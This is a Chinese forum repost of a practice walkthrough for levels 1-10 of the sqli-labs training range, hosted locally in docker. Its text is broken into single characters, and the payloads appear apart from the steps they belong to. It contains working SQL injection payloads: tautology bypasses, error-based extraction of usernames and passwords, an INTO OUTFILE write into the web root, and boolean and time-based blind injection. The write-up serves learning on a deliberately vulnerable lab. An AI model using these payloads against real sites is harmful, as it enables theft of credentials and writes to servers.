论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[20342] 2020-06-29_【web安全】sqli-lab靶场1-10关练习笔记
文档创建者:
s7ckTeam
浏览次数:
3
最后更新:
2025-01-18
Web安全
3 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2020-06-29_【web安全】sqli-lab靶场1-10关练习笔记
【
w
e
b
安
全
】
s
q
l
i
-
l
a
b
靶
场
1
-
1
0
关
练
习
笔
记
K
h
a
n
安
全
攻
防
实
验
室
2
0
2
0
-
0
6
-
2
9
以
下
文
章
来
源
于
暗
魂
安
全
团
队
,
作
者
G
4
b
r
1
e
l
0
x
0
0
虚
拟
机
搭
建
虚
拟
机
搭
建
s
q
l
i
-
l
a
b
大
家
好
,
我
是
许
心
痕
。
这
是
我
写
的
靶
场
笔
记
,
欢
迎
阅
读
。
这
里
采
用
d
o
c
k
e
r
一
键
部
署
。
0
x
0
1
s
q
l
i
-
l
a
b
第
一
关
第
一
关
第
一
关
使
用
G
E
T
参
数
,
单
引
号
&
&
字
符
串
&
&
显
错
注
入
。
u
r
l
中
添
加
g
e
t
参
数
?
i
d
=
1
,
即
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
1
/
?
i
d
=
1
进
入
注
入
页
面
。
在
u
r
l
后
面
添
加
英
文
输
入
法
中
的
单
引
号
,
即
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
1
/
?
i
d
=
1
'
,
则
报
错
暗
魂
安
全
团
队
暗
魂
安
全
团
队
.
专
注
于
研
究
网
络
空
间
安
全
、
红
蓝
攻
防
、
内
网
安
全
、
w
e
b
安
全
、
二
进
制
安
全
技
术
本
文
采
用
u
b
u
n
t
u
1
6
.
0
4
安
装
更
新
源
:
s
u
d
o
a
p
t
-
g
e
t
u
p
d
a
t
e
&
&
s
u
d
o
a
p
t
-
g
e
t
u
p
g
r
a
d
e
-
y
安
装
d
o
c
k
e
r
:
c
u
r
l
-
s
h
t
t
p
s
:
/
/
g
e
t
.
d
o
c
k
e
r
.
c
o
m
/
|
s
h
搜
索
d
o
c
k
e
r
镜
像
中
的
s
q
l
i
-
l
a
b
靶
场
:
d
o
c
k
e
r
s
e
a
r
c
h
s
q
l
i
-
l
a
b
/
/
第
一
个
就
是
我
们
要
找
的
靶
场
镜
像
镜
像
下
载
:
d
o
c
k
e
r
p
u
l
l
a
c
g
p
i
a
n
o
/
s
q
l
i
-
l
a
b
s
运
行
镜
像
容
器
:
d
o
c
k
e
r
r
u
n
-
d
-
p
8
0
:
8
0
a
c
g
p
i
a
n
o
/
s
q
l
i
-
l
a
b
s
打
开
靶
场
后
请
先
重
置
数
据
库
,
然
后
我
们
从
第
一
页
开
始
做
起
此
时
的
s
q
l
查
询
语
句
为
:
两
个
单
引
号
,
所
以
报
错
那
么
在
我
们
构
造
查
询
语
句
:
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
1
/
?
i
d
=
-
1
'
o
r
'
1
此
时
的
查
询
语
句
为
:
因
为
o
r
后
边
是
'
1
'
是
t
r
u
e
,
虽
然
i
d
=
'
-
1
'
是
f
a
l
s
e
,
但
是
执
行
或
运
算
以
后
,
只
要
有
一
个
是
t
r
u
e
,
那
么
整
个
语
句
永
远
为
t
r
u
e
。
则
正
常
显
示
0
x
0
2
s
q
l
i
-
l
a
b
第
二
关
第
二
关
第
二
关
是
G
E
T
型
&
&
整
数
&
&
显
错
注
入
,
同
样
在
u
r
l
后
面
输
入
g
e
t
参
数
?
i
d
=
1
。
后
面
就
不
讲
了
,
1
-
1
0
关
都
是
G
E
T
型
注
入
。
在
u
r
l
后
面
添
加
:
报
错
s
e
l
e
c
t
*
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
'
1
'
'
s
e
l
e
c
t
*
f
o
r
m
u
s
e
r
s
w
h
e
r
e
i
d
=
'
-
1
'
o
r
'
1
'
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
2
/
?
i
d
=
1
a
构
造
语
句
,
使
用
一
个
不
存
在
的
用
户
i
d
=
-
1
:
,
返
回
正
常
此
时
的
查
询
语
句
为
:
原
理
跟
第
一
关
一
样
,
或
运
算
有
一
个
为
t
r
u
e
,
那
么
整
个
语
句
也
是
永
真
t
r
u
e
条
件
0
x
0
3
s
q
l
i
-
l
a
b
第
三
关
第
三
关
第
三
关
是
G
E
T
&
&
有
括
号
的
单
引
号
&
&
字
符
串
&
&
显
错
注
入
构
造
语
句
,
使
用
一
个
不
存
在
的
用
户
i
d
=
-
1
:
,
返
回
正
常
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
2
/
?
i
d
=
-
1
o
r
1
s
e
l
e
c
t
*
f
o
r
m
u
s
e
r
s
w
h
e
r
e
i
d
=
-
1
o
r
1
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
3
/
?
i
d
=
-
1
'
)
o
r
(
'
1
此
时
的
查
询
语
句
为
:
原
理
还
是
构
造
了
一
个
永
远
是
t
r
u
e
的
s
q
l
语
句
。
0
x
0
4
s
q
l
i
-
l
a
b
第
四
关
第
四
关
第
四
关
是
G
E
T
&
&
有
括
号
的
双
引
号
&
&
字
符
串
&
&
显
错
注
入
构
造
语
句
,
使
用
一
个
不
存
在
的
用
户
i
d
=
-
1
:
此
时
的
查
询
语
句
为
:
返
回
正
常
。
0
x
0
5
s
q
l
i
-
l
a
b
第
五
关
第
五
关
第
五
关
是
G
E
T
&
&
双
查
询
&
&
单
引
号
&
&
字
符
串
&
&
显
错
注
入
。
第
五
关
稍
微
有
点
难
度
,
我
们
的
目
的
是
让
这
个
页
面
显
示
出
任
意
一
个
用
户
的
名
字
。
双
查
询
注
入
是
利
用
了
数
据
库
出
错
的
原
理
,
爆
破
出
数
据
。
我
们
爆
出
第
一
个
用
户
i
d
=
1
的
名
字
构
造
语
句
:
s
e
l
e
c
t
*
f
o
r
m
u
s
e
r
s
w
h
e
r
e
i
d
=
(
'
-
1
'
)
o
r
(
'
1
'
)
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
4
/
?
i
d
=
-
1
"
)
o
r
(
"
1
s
e
l
e
c
t
*
f
o
r
m
u
s
e
r
s
w
h
e
r
e
i
d
=
(
"
-
1
"
)
o
r
(
"
1
"
)
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
5
/
?
i
d
=
1
'
u
n
i
o
n
s
e
l
e
c
t
c
o
u
n
t
(
*
)
,
c
o
u
n
t
(
*
)
,
c
o
n
c
a
t
(
0
x
3
a
,
0
x
3
a
,
(
s
e
l
e
c
t
c
o
n
c
a
t
(
u
s
e
r
n
a
m
e
,
0
x
3
a
,
p
a
s
s
w
o
r
d
)
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
1
)
,
0
x
3
a
,
0
x
3
a
这
种
注
入
利
用
了
随
机
函
数
,
因
此
成
功
率
不
是
1
0
0
%
。
我
们
重
复
刷
新
页
面
,
成
功
爆
出
用
户
名
为
D
u
m
b
此
时
的
查
询
语
句
为
:
0
x
0
6
s
q
l
i
-
l
a
b
第
六
关
第
六
关
第
六
关
是
G
E
T
&
&
双
查
询
&
&
双
引
号
&
&
字
符
串
&
&
显
错
注
入
。
第
六
关
稍
微
有
点
难
度
,
我
们
的
目
的
是
让
这
个
页
面
显
示
出
任
意
一
个
用
户
的
名
字
。
双
查
询
注
入
是
利
用
了
数
据
库
出
错
的
原
理
,
爆
破
出
数
据
。
我
们
爆
出
第
一
个
用
户
i
d
=
1
的
名
字
构
造
语
句
:
这
种
注
入
利
用
了
随
机
函
数
,
因
此
成
功
率
不
是
1
0
0
%
。
我
们
重
复
刷
新
七
八
次
页
面
,
成
功
爆
出
用
户
名
为
D
u
m
b
此
时
的
查
询
语
句
为
:
0
x
0
7
s
q
l
i
-
l
a
b
第
七
关
第
七
关
s
e
l
e
c
t
*
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
'
1
'
u
n
i
o
n
s
e
l
e
c
t
c
o
u
n
t
(
*
)
,
c
o
u
n
t
(
*
)
,
c
o
n
c
a
t
(
0
x
3
a
,
0
x
3
a
,
(
s
e
l
e
c
t
c
o
n
c
a
t
(
u
s
e
r
n
a
m
e
,
0
x
3
a
,
p
a
s
s
w
o
r
d
)
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
1
)
,
0
x
3
a
,
0
x
3
a
,
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
6
/
?
i
d
=
1
"
u
n
i
o
n
s
e
l
e
c
t
c
o
u
n
t
(
*
)
,
c
o
u
n
t
(
*
)
,
c
o
n
c
a
t
(
0
x
3
a
,
0
x
3
a
,
(
s
e
l
e
c
t
c
o
n
c
a
t
(
u
s
e
r
n
a
m
e
,
0
x
3
a
,
p
a
s
s
w
o
r
d
)
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
1
)
,
0
x
3
a
,
0
x
3
a
s
e
l
e
c
t
*
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
"
1
"
u
n
i
o
n
s
e
l
e
c
t
c
o
u
n
t
(
*
)
,
c
o
u
n
t
(
*
)
,
c
o
n
c
a
t
(
0
x
3
a
,
0
x
3
a
,
(
s
e
l
e
c
t
c
o
n
c
a
t
(
u
s
e
r
n
a
m
e
,
0
x
3
a
,
p
a
s
s
w
o
r
d
)
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
1
)
,
0
x
3
a
,
0
x
3
a
,
第
七
关
是
G
E
T
&
&
双
查
询
&
&
双
引
号
&
&
字
符
串
&
&
显
错
注
入
,
目
的
是
d
u
m
p
输
出
一
个
文
件
。
因
为
表
里
有
三
个
字
段
,
那
么
可
以
使
用
u
n
i
o
n
联
合
查
询
构
造
语
句
:
此
时
的
查
询
语
句
是
在
l
i
n
u
x
中
,
网
站
一
般
是
放
在
/
v
a
r
/
w
w
w
/
h
t
m
l
目
录
里
,
这
里
我
们
d
u
m
p
一
个
文
件
到
这
个
目
录
,
名
字
是
h
a
c
k
e
r
.
t
x
t
。
这
里
不
说
上
传
网
马
。
构
造
语
句
:
虽
然
报
错
,
但
是
文
件
已
经
生
成
打
开
链
接
:
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
h
a
c
k
e
r
.
t
x
t
即
可
找
到
此
时
的
s
q
l
语
句
为
:
0
x
0
8
s
q
l
i
-
l
a
b
第
八
关
第
八
关
第
八
关
是
G
E
T
&
&
布
尔
&
&
单
引
号
盲
注
,
所
谓
盲
注
就
是
不
显
示
任
何
错
误
,
只
能
猜
解
。
我
们
猜
测
当
前
数
据
库
用
户
的
第
一
个
字
母
,
在
s
q
l
里
语
句
a
s
c
i
i
(
s
u
b
s
t
r
(
u
s
e
r
(
)
,
1
,
1
)
)
表
示
当
前
数
据
库
用
户
名
字
的
第
一
个
字
母
的
a
s
c
i
i
值
。
构
造
语
句
:
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
7
/
?
i
d
=
1
"
)
)
u
n
i
o
n
s
e
l
e
c
t
1
,
2
,
3
-
-
(
(
"
s
e
l
e
c
t
*
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
(
(
'
1
'
)
)
u
n
i
o
n
s
e
l
e
c
t
1
,
2
,
3
-
-
(
(
'
)
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
7
/
?
i
d
=
1
'
)
)
u
n
i
o
n
s
e
l
e
c
t
1
,
'
h
a
c
k
e
r
b
y
x
u
x
i
n
h
e
n
'
,
3
i
n
t
o
o
u
t
f
i
l
e
'
/
v
a
r
/
w
w
w
/
h
t
m
l
/
h
a
c
k
e
r
.
t
x
t
'
-
-
(
(
'
s
e
l
e
c
t
*
f
r
o
m
u
s
e
r
s
w
h
e
r
e
i
d
=
(
(
'
1
'
)
)
u
n
i
o
n
s
e
l
e
c
t
1
,
'
h
a
c
k
e
r
b
y
x
u
x
i
n
h
e
n
'
,
3
i
n
t
o
o
u
t
f
i
l
e
'
/
v
a
r
/
w
w
w
/
h
t
m
l
/
h
a
c
k
e
r
.
t
x
t
'
-
-
(
(
'
如
果
当
前
用
户
第
一
个
字
母
的
a
s
c
i
i
值
小
于
1
0
0
则
页
面
应
该
显
示
Y
o
u
a
r
e
i
n
才
对
。
但
是
没
有
,
所
以
是
大
于
1
0
0
,
如
果
构
造
:
则
返
回
正
常
则
说
明
首
字
母
a
s
c
i
i
在
1
0
0
-
1
5
0
之
间
,
利
用
折
半
法
快
速
查
询
,
可
以
查
到
首
字
母
a
s
c
i
i
是
1
1
4
,
对
应
字
母
r
0
x
0
9
s
q
l
i
-
l
a
b
第
九
关
第
九
关
第
九
关
是
G
E
T
&
&
布
尔
&
&
单
引
号
基
于
时
间
盲
注
,
所
谓
时
间
盲
注
就
是
利
用
s
l
e
e
p
函
数
,
让
数
据
库
睡
一
会
儿
,
这
样
这
个
网
页
就
会
打
开
的
很
忙
,
根
据
网
页
打
开
的
时
间
差
来
判
断
a
s
c
i
i
值
等
等
。
我
们
当
前
的
数
据
库
用
户
是
r
o
o
t
,
可
以
通
过
前
几
课
注
入
出
来
。
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
8
/
?
i
d
=
1
'
a
n
d
a
s
c
i
i
(
s
u
b
s
t
r
(
u
s
e
r
(
)
,
1
,
1
)
)
<
1
0
0
-
-
'
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
8
/
?
i
d
=
1
'
a
n
d
a
s
c
i
i
(
s
u
b
s
t
r
(
u
s
e
r
(
)
,
1
,
1
)
)
<
1
5
0
-
-
'
M
y
s
q
l
里
有
个
函
数
i
f
(
条
件
,
表
达
1
,
表
达
2
)
如
果
条
件
是
t
r
u
e
在
执
行
表
达
式
1
否
则
执
行
表
达
式
2
。
构
造
语
句
:
那
么
当
前
网
页
5
秒
钟
之
后
才
正
常
打
开
我
们
判
断
当
前
用
户
是
否
是
r
o
o
t
用
户
,
可
以
构
造
语
句
:
如
果
5
秒
钟
之
后
才
打
开
,
说
明
判
断
用
户
是
r
o
o
t
用
户
,
如
果
一
下
子
就
打
开
了
,
那
么
说
明
不
是
r
o
o
t
用
户
0
x
1
0
s
q
l
i
-
l
a
b
第
十
关
第
十
关
第
十
关
是
G
E
T
&
&
布
尔
&
&
双
引
号
基
于
时
间
盲
注
,
跟
第
九
关
差
不
多
。
不
多
说
了
,
写
到
这
里
已
经
很
累
的
,
好
困
啊
,
现
在
是
2
3
:
1
4
分
,
写
完
这
个
该
睡
觉
了
。
判
断
是
否
是
r
o
o
t
用
户
,
构
造
语
句
:
五
秒
钟
后
才
正
常
打
开
,
说
明
当
前
用
户
是
r
o
o
t
用
户
结
束
语
结
束
语
这
篇
文
章
写
了
很
长
时
间
了
,
这
些
注
入
语
句
也
算
是
基
础
的
内
容
,
加
深
了
我
对
S
Q
L
注
入
的
印
象
。
当
然
在
实
际
做
w
e
b
渗
透
过
程
中
肯
定
没
有
那
么
简
单
。
不
过
能
用
工
具
的
最
好
不
用
手
工
,
节
省
时
间
,
提
高
效
率
。
我
第
一
次
写
注
入
文
章
好
像
是
,
有
些
不
对
的
地
方
还
请
加
我
Q
Q
2
0
6
3
3
6
7
6
7
1
指
出
!
▼
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
9
/
?
i
d
=
1
'
a
n
d
s
l
e
e
p
(
5
)
-
-
'
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
9
/
?
i
d
=
1
'
a
n
d
i
f
(
(
s
e
l
e
c
t
s
u
b
s
t
r
(
u
s
e
r
(
)
,
1
,
4
)
=
'
r
o
o
t
'
)
,
s
l
e
e
p
(
5
)
,
n
u
l
l
)
-
-
'
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
2
8
.
5
8
/
L
e
s
s
-
1
0
/
?
i
d
=
1
"
a
n
d
i
f
(
(
s
e
l
e
c
t
s
u
b
s
t
r
(
u
s
e
r
(
)
,
1
,
4
)
=
'
r
o
o
t
'
)
,
s
l
e
e
p
(
5
)
,
n
u
l
l
)
-
-
"
往
期
精
彩
回
顾
▼
【
二
进
制
安
全
】
熊
猫
烧
香
病
毒
分
析
【
信
息
安
全
】
信
息
安
全
理
论
笔
记
分
享
图
片
E
N
D
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全